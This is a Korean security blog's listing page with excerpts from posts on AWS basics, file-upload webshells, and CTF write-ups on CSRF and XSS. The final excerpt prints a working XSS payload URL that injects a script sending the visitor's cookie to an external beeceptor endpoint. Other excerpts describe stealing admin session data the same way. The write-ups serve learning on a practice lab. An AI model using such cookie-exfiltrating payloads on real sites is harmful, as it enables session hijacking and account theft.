전체 글74 AWS 리소스 기초 - 1/3 AWS의 전반적인 리소스 기초를 정리해보겠습니다. 안전한 인프라 환경 설정을 위해 보안 측면에서 작성해보겠습니다. Virtualization & Nitro 하나의 물리 서버 위에 여러 가상 컴퓨터가 올라와 있는 구조이다. 앱 하나가 서버 전체를 점유하는 것에 비해 자원을 효율적으로 사용할 수 있다. 아래의 2가지 Hypervisor를 비교해보자 구분Bare-metal HypervisorHosted Hypervisor설치 위치 하드웨어 위에 직접 설치OS 위에 설치 성능서버급 고성능OS간섭으로 성능 손실주요 사용처AWS 데이터 센터 (Nitro, KVM)개인 PC (VitualBox) Bare-metal HypervisorPhysical Server -> Hypervisor -> Guest OS -> A.. 2026. 3. 9. 파일 업로드 취약점 (webshell) 파일 업로드 취약점은 해커가 원하는 파일을 서버에 업로드하는 공격이다. php코드를 공격자에게 그대로 주는 게 아니라 그것을 실행시켜서 주기에 문제가 된다. php 코드가 실행되어 해커가 shell을 획득하면 명령어를 받고 처리한다. webshell 은 웹서버에서 실행되는 웹서버 측 스크립트이다. 서버이기에 언어마다 다르기에 어떤 운영체제를 사용하는지 어떤 언어를 사용하는지 알아야 한다. 공격이 실행되는 조건1. php 파일이 실행되어야 한다. 2. was 위치에서 접근가능한 위치에 있어야 한다. 3. 업로드된 파일은 웹서버로부터 접근 가능한 경로여야 한다. 공격하는 방법1. content-type을 서버가 믿는다는 것을 해커가 이용한다.burp suite를 통해 content-type을 변경하여 공.. 2026. 1. 22. csrf 문제 풀이 csrf_1 문제 (get 요청)게시판 내용 부분에 위의 payload 를 게시판 내용에 넣고 다시 읽을 때 는 위와 같이 회원 정보 수정에 성공했다는 알림이 뜬다. 관리자가 이러한 알림을 본다면 의심하게 된다. 그렇기에 안뜨게 하려면 위의 문제와 마찬가지로 을 사용한다. 다시 들어가보면 아무것도 뜨지 않고 실행되고 있음을 알 수 있다. 관리자가 중간에 알아채는 것 없이 접속했다.이후 norm_admin을 id로 1004(변경 이후)으로 로그인 하면 flag를 획득할 수 있다. csrf_3 문제(csrf 토큰)앞의 문제들과 같이 게시판 내용에 적힌 script가 그대로 실행되어 xss 공격이 가능하다.공격문을 넣기 전 mypage_update가 어떻게 이뤄지는 지 보기 위해 개발자 도구에서 network.. 2026. 1. 14. ClientScript StealInfo 1번notice 글을 읽을 때 xss 공격이 실행되는 것을 확인한 후 주요 정보가 있는 마이페이지에 iframe으로 접근해서 innertext를 통해 마이페이지에 있는 글들이 출력되도록 한다. 위의 캡처본을 보면 게시판 내용 부분에서 마이페이지가 출력되는 것을 알 수 있다. beeceptor로 요청이 보내지도록 설정해둔 결과 위와 같은 결과가 나온다. -> This is a very secret Info 라는 글자가 그대로 출력된다. 관리자가 아니면 절대로 접근이 안되는 secret.php에 접근을 시도한다. 관리자 권한으로 접근해야하기에 관리자 접근 사이트에서 해당 사이트의 url을 접속하면 beeceptor에서 request/response 값을 볼 수 있다. StealInfo.. 2026. 1. 3. xss write up 3 xss 5번 문제글을 수정할 때 등록할 때 모두 html entity로 바뀌는 것을 알 수 있다. 이렇게 저장되게 하는 js 코드를 보면 아래와 같이 replace를 통해 바뀌는 것을 알 수 있다. checkContent 함수와 onsubmit을 삭제한 뒤 다시 요청을 보내면 script가 실행되는 것을 알 수 있다. intercept를 통해 중간에 response의 코드를 변경한다. 앞에서 언급했던 삭제해야하는 부분을 response에서 삭제한 후 forward를 하면 아래와 같이 쿠키값이 나온다. 관리자 페이지에서 위의 url을 클릭하면 관리자의 세션 id가 beeceptor에 전달되도록 script에 쿠키값이 잘 전달되었음을 알 수 있다. 이제는 관리자 페이지에서 url을 보내면 flag값을 얻.. 2025. 12. 26. xss writeup 2 xss 문제 3mypage에 user 파라미터에 norm' 을 작성한 결과 그대로 화면에 나타나는 것을 알 수 있다. url 에 쿠키값이 출력되도록 작성한 다음 결과를 보면 실제 그대로 화면에 나타나는 것을 알 수 있다.이를 이용해 beeceptor 라는 서버로 쿠키값을 보내는 공격을 시도할 것이다. 실제 관리자가 방문하는 사이트에 url을 넣은 다음 그것을 클릭하면 관리자의 쿠키값이 beeceptor 라는 공격자의 서버에서 출력된다. (flag값 획득) http://ctf.segfaulthub.com:4343/xss_3/mypage.php?user=%22/%3E%3Cscript%3Enew%20Image().src=%22https://entry.free.beeceptor.com?cookie=%22%2bd.. 2025. 12. 24. 이전 1 ··· 4 5 6 7 8 9 10 ··· 13 다음
